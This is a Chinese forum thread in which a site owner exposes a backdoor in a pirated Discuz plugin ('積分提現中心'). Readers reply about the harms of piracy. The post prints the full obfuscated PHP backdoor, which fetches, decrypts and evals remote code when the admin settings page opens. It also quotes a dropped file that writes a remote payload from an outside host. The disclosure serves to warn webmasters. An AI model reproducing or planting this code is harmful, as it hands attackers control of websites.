【續集】魔趣吧的東西真的有后門木馬，揭秘用盜版的危害

密碼忘了

上次寫了一篇文章 披露了盜版市場的亂象 ，沒想到本人遭到魔趣吧的站長瘋狂的報復。我自己的網站已經持續快10天被魔趣吧的站長使用DDOS攻擊技術，打不開了！因為在其網站進行了手機綁定，手機也整天被短信+電話轟炸！搞的我最近經常要開飛行模式！
但是我是絕對不會像黑惡勢力低頭的，大不了我網站不做了，手機號碼不用了！

前文回顧：魔趣吧的東西好像真的有后門木馬，改了我dz的后臺密碼
http://www.9999xn.com/thread-5095-1-1.html

因為前面的那篇文章寫的比較概況，沒有列舉證據（導致其大肆誤導不明真相的群眾說我在造謠），今天我就來列舉一些證據，并對已知的后門進行深入詳細的分析！
這可能是最后一篇曝光盜版市場亂象的文章了，因為我只是一個普普通通的站長！那些江湖經驗豐富的站長我惹不起，我也見識了魔趣吧是如果把黑的說成白的！

他的理念就是：只要對他有利的都是好文章，曝光他的都是在造謠他！

在正式進入主題之前，我想在說幾句題外話：先不說他有沒有干些見不得人的事，其損壞原創開發者權益，謀取自己的利益(俗稱：盜版)，還有什么資格在那一副正人君子的模樣懟這個懟那個！

【下面才是今天要說的主題】
由于帶后門的資源有點多，今天我就隨便拿個在魔趣吧收費的資源，且我之前安裝過，受害的資源來做分析！

樣本下載鏈接：為了不給他打廣告，帖子ID： 9183 ，知道他網站的隨便打開一個帖子把id換成這個就可以定位到！

因為是VIP資源，所以我分享到了藍奏網盤：https://wws.lanzous.com/iH9IQe6jymf  密碼:c9mx

附件MD5值：C03B189CA9E0EA7F1229F609A48EC705
防止因為我的曝光，他會修改附件，然后狡辯！對本文有異議的朋友可以在本文發布不久的時候，前去下載對比MD5值后，并效驗是不是存在本文提到的后門木馬！

樣本插件名稱：積分提現中心 V1.2

木馬文件所在路徑：keke_tixian\function\function_core.php


木馬完整代碼：

1. <?php
   
2. function zm_diconv($str){
   
3.   $encode = mb_detect_encoding($str, array(
   
4. 
   
5.         "ASCII",
   
6. 
   
7.         "UTF-8",
   
8. 
   
9.         "GB2312",
   
10. 
    
11.         "GBK",
    
12. 
    
13.         "BIG5"
    
14. 
    
15.     ));
    
16. 
    
17.     if ($encode != CHARSET) {
    
18. 
    
19.         //$keytitle = iconv($encode,CHARSET."//IGNORE",$str);
    
20. 
    
21.         $keytitle = mb_convert_encoding($str, CHARSET, $encode);
    
22. 
    
23.     }
    
24. 
    
25.     if (!$keytitle) {
    
26. 
    
27.         $keytitle = $str;
    
28. 
    
29.     }
    
30. 
    
31.     return $keytitle;
    
32. 
    
33. }
    
34. function caidi($oo){
    
35.     $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
    
36.         $forver=stripos($love,'d');
    
37.         $forvere=stripos($love,'z');
    
38.         $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
    
39.         $forveres='DECODE';
    
40.         $aini=substr($love,$forver,$forvere);//獲取方法函數名decrypt
    
41.         $aini=$oo?$forveres:$aini;
    
42.         return $aini;
    
43. }
    
44. function decrypt($data, $key = '721520') {
    
45.                 global $_G;
    
46.                 $key = $key ? $key : $_G['config']['security']['authkey'];
    
47.                 $type = caidi($key);
    
48.                 return authcode($data,$type, $key);
    
49.                 }
    
50. 
    
51. function contentz($svip) {
    
52. if(function_exists('file_get_contents')) {
    
53. $data = file_get_contents($svip);
    
54. } else {
    
55. $ch = curl_init();
    
56. $timeout = 5;
    
57. curl_setopt ($ch, CURLOPT_URL, $svip);
    
58. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    
59. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    
60. $data = curl_exec($ch);
    
61. curl_close($ch);
    
62. }
    
63. return $data;
    
64. }
    
65. $iloveyou = caidi($oo);
    
66. eval($iloveyou(strip_tags(contentz($love))));
    
67. ?>

復制代碼

關鍵代碼：

1. $iloveyou = caidi($oo);
   
2. eval($iloveyou(strip_tags(contentz($love))));

復制代碼

有了這些信息 我們下面進行分析(在這里大膽的猜測一下：文件完全是魔趣吧自己加進去的，正版可能就沒有這個文件，因為這個文件代碼全是和后門有關！和插件自身功能沒有關系)
在關鍵代碼前面的都是木馬偽裝所需要用到的函數 執行過程如下：
1/----------------------

后門腳本執行入口：keke_tixian\admin.inc.php
關鍵代碼在該文件第7行：引用后門文件并執行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
解釋：只要安裝插件一打開后臺的插件設置，木馬就自動執行了！

2/--------依次執行----------


$iloveyou = caidi($oo);
解釋：定義一個名為   iloveyou 的變量  ,值為： caidi($oo)
調試： $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ，得到 iloveyou 的值等于：decrypt
備注：函數 caidi 定義并賦值了 $love  作全局變量， love 的值等于：htt去p://zonekey.w掉in/b中ai文duseo.xml  (去掉中文)

3/--------依次執行----------

eval($iloveyou(strip_tags(contentz($love))));

解釋：已知 iloveyou 的值等于：decrypt，得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));

分析函數 contentz 得知該函數 是訪問遠程鏈接并返回內容，相當于 curl
分析函數 decrypt 得知該函數 是進行內容解密，直接調用了DISCUZ自帶的解密函數 authcode


解釋的解釋：代碼 eval($iloveyou(strip_tags(contentz($love)))); ，經過層層分析，最終為：
執行腳本 ( 解密 ( 訪問遠程代碼 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );

4/--------依次執行----------

因 htt去p://zonekey.w掉in/b中ai文duseo.xml 該鏈接現在訪問返回的全部是 1111111111111111，所以無法繼續分析遠程的代碼是什么！

可能魔趣吧站長已經知道我接下來會深入曝光他。所以暫時把遠程代碼先全部改成了 1111111111111111
即使是這樣！又如何？ 執行遠程腳本 有什么危害？相信做網站的都知道！這里我不進行科普！感興趣的站長可以百度自行科普：例：一句話木馬，菜刀！
下面的代碼是我網站自動多出來的一個文件：因為無法繼續分析，直接看結果

1. <?php
   
2. file_put_contents("schizwcingu.php",file_get_contents("http://iqqvps.com/xss.txt"));

復制代碼

上面的xss.txt  防止 魔趣吧站長 再去取消 我上傳到了 藍奏網盤 https://wws.lanzous.com/iPkAWe6na9c 密碼:i1nc

End/--------刨根問底--------

在前面一篇文章中提到過了  魔趣吧站長聲稱該木馬是源碼哥的！
但是既然干了，就干到底！
百度了一下 搜索 到 源碼哥  ，在他網站搜索 了一下 積分提現中心  果然找到一個一模一樣的版本！
花了20塊錢下載下來（真黑啊，1.2  這么舊的版本還賣20），不過花20塊錢 能讓大家看清，防止中木馬。也值得！

結局打臉： 沒有 keke_tixian\function\function_core.php  這個文件，因為是邊寫邊弄的，既然寫好了就這樣吧！
雖然沒有發現木馬，但是應該也是一丘之貉，還是呼吁大家不要用盜版！不要用盜版！不要用盜版！

PS：對魔趣吧站長傳播木馬，DDOS我的網站，短信+電話轟炸我的手機號 表示非常的鄙視！


希望官方管理員能夠曝光這篇文章，讓更多準備用盜版的站長、已經在用盜版的站長。趕緊回頭是岸！
樣本已經上傳到藍奏網盤，文章寫的不到位的地方，歡迎各路大神補充！

密碼忘了

文中忘記說了！不能編輯 就占樓吧！
看圖打臉


1、保證無后門     
打臉：無后門！只是有木馬
不如：保證無后門，絕對有木馬！

2、魔趣吧修復后發布！
打臉：正版好好的東西，被魔趣吧修復一下就多了個后門木馬？
不如：魔趣吧增加木馬后發布

3、資源均經測試，請放心使用！
打臉：放個木馬在你網站，你能放心？
不如：木馬功能已經測試，請放心使用！零失誤！


4、官方認證圖標
打臉：魔趣吧官方正版木馬，請放心中毒！

密碼忘了

申明：本文不是針對 可可 正版的應用  正版應用肯定是沒有木馬的！
本文說的是盜版的！

湖中沉

簡單點說：無利不起早

開發者的利，自然是賣產品，也就是賣插件模板，為了多得利，自然要做好產品
站長的利，自然是通過程序賺錢或專區流量最終變現（也許你現在不賺錢，但別說永遠不打算賺錢）
盜版站的利，要么是錢，要么是流量，但最終和站長是一樣的，還是變現，如果打著所謂免費旗號，那么最終一定會在隱藏的地方來想辦法賺錢，那么很明顯，黑產是最簡單的選擇，那么后門木馬就不稀奇了。

賺錢可以，但請通過自己的勞動正當獲益，你要是自己寫代碼提供給站長，誰也沒權利指責你，但開發者費時費力的勞動所得，你偷去倒賣，這就很不道德了，并且不止是不道德，這是違法的。

再加上黑產，那么就更加讓人憤怒了，也就是說兩頭吃。

無利不起早，為利無可厚非，但請緊守底線，尊重別人的勞動。

經常有“站長”指責開發者賣的貴，不厚道。那么請你能寫出一樣的東西免費提供出來，但不能是偷別人的東西提供出來哦。當你能寫出一樣的東西的時候，并能始終免費提供，我向您投以真誠的敬意。

但別人通過大量的學習、探索、耗費精力和時間，勞動所得寫出的內容，以此獲取回報，則不能予以譴責。我們自然應當感恩免費的饋贈，但也同時應當尊重勞動回報的需求。

重慶之家

以前貪便宜也是用盜版插件模版，安全中心三天兩頭的發出風險告警首頁老是被改，刪除了所有盜版插件模版，現在一直好好的

xiaomianlang

魔趣我不知道 反正哪個源碼哥的肯定是有木馬。都自己修改內容

羅永浩

幾百塊一個月上高防就行。

onetheme

羅永浩 發表于 2020-7-1 02:59
幾百塊一個月上高防就行。

能舍得幾百塊一個月高防用盜版，何不花百十塊買個正版使用，不香嗎？

初錦

嗯，當我看見你那個帖子的時候，發現一個叫做魔趣吧的用戶回復了你但被discuz管理員屏蔽了我就知道事情不簡單。我不站樓主和魔趣吧，我站discuz管理員的做法（放肆的大笑）

墨裔

這故事引起了我的注意